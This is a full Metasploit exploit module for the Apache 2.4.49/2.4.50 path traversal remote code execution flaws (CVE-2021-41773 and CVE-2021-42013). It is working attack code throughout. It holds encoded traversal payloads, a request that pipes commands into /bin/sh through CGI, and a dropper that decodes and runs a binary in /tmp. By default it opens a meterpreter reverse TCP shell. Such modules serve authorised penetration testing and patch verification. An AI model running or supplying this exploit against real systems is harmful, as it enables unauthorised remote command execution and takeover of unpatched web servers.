Apache 2.4.49 / 2.4.50 Traversal / Remote Code Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::EXE  
include Msf::Exploit::FileDropper  
include Msf::Exploit::Remote::CheckModule  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Apache 2.4.49/2.4.50 Traversal RCE',  
'Description' => %q{  
This module exploit an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773).  
If files outside of the document root are not protected by ‘require all denied’ and CGI has been explicitly enabled,  
it can be used to execute arbitrary commands (Remote Command Execution).  
This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).  
},  
'References' => [  
['CVE', '2021-41773'],  
['CVE', '2021-42013'],  
['URL', 'https://httpd.apache.org/security/vulnerabilities_24.html'],  
['URL', 'https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse'],  
['URL', 'https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/apache/apache-httpd-rce.yaml'],  
['URL', 'https://github.com/projectdiscovery/nuclei-templates/commit/9384dd235ec5107f423d930ac80055f2ce2bff74'],  
['URL', 'https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis']  
],  
'Author' => [  
'Ash Daulton', # Vulnerability discovery  
'Dhiraj Mishra', # Metasploit auxiliary module  
'mekhalleh (RAMELLA Sébastien)' # Metasploit exploit module (Zeop Entreprise)  
],  
'DisclosureDate' => '2021-05-10',  
'License' => MSF_LICENSE,  
'Platform' => ['unix', 'linux'],  
'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],  
'DefaultOptions' => {  
'CheckModule' => 'auxiliary/scanner/http/apache_normalize_path',  
'Action' => 'CHECK_RCE',  
'RPORT' => 443,  
'SSL' => true  
},  
'Targets' => [  
[  
'Automatic (Dropper)',  
{  
'Platform' => 'linux',  
'Arch' => [ARCH_X64, ARCH_X86],  
'Type' => :linux_dropper,  
'DefaultOptions' => {  
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',  
'DisablePayloadHandler' => 'false'  
}  
}  
],  
[  
'Unix Command (In-Memory)',  
{  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'Type' => :unix_command,  
'DefaultOptions' => {  
'PAYLOAD' => 'cmd/unix/generic',  
'DisablePayloadHandler' => 'true'  
}  
}  
],  
],  
'DefaultTarget' => 0,  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]  
}  
)  
)  
  
register_options([  
OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2021-42013', ['CVE-2021-41773', 'CVE-2021-42013']]),  
OptInt.new('DEPTH', [true, 'Depth for Path Traversal', 5]),  
OptString.new('TARGETURI', [true, 'Base path', '/cgi-bin'])  
])  
end  
  
def cmd_unix_generic?  
datastore['PAYLOAD'] == 'cmd/unix/generic'  
end  
  
def execute_command(command, _opts = {})  
traversal = pick_payload * datastore['DEPTH'] << '/bin/sh'  
  
uri = normalize_uri(datastore['TARGETURI'], traversal.to_s)  
response = send_request_raw({  
'method' => Rex::Text.rand_text_alpha(3..4),  
'uri' => uri,  
'data' => "#{Rex::Text.rand_text_alpha(1..3)}=|echo;#{command}"  
})  
if response && response.body  
return response.body  
end  
  
false  
end  
  
def message(msg)  
"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}"  
end  
  
def pick_payload  
case datastore['CVE']  
when 'CVE-2021-41773'  
payload = '.%2e/'  
when 'CVE-2021-42013'  
payload = '.%%32%65/'  
else  
payload = ''  
end  
  
payload  
end  
  
def exploit  
@proto = (ssl ? 'https' : 'http')  
  
if (!check.eql? Exploit::CheckCode::Vulnerable) && !datastore['ForceExploit']  
fail_with(Failure::NotVulnerable, 'The target is not exploitable.')  
end  
  
print_status(message("Attempt to exploit for #{datastore['CVE']}"))  
case target['Type']  
when :linux_dropper  
  
file_name = "/tmp/#{Rex::Text.rand_text_alpha(4..8)}"  
cmd = "echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}"  
  
print_status(message("Sending #{datastore['PAYLOAD']} command payload"))  
vprint_status(message("Generated command payload: #{cmd}"))  
  
execute_command(cmd)  
  
register_file_for_cleanup file_name  
when :unix_command  
vprint_status(message("Generated payload: #{payload.encoded}"))  
  
if !cmd_unix_generic?  
execute_command(payload.encoded)  
else  
received = execute_command(payload.encoded.to_s)  
  
print_warning(message('Dumping command output in response'))  
if !received  
print_error(message('Empty response, no command output'))  
  
return  
end  
print_line(received)  
end  
end  
end  
end  
`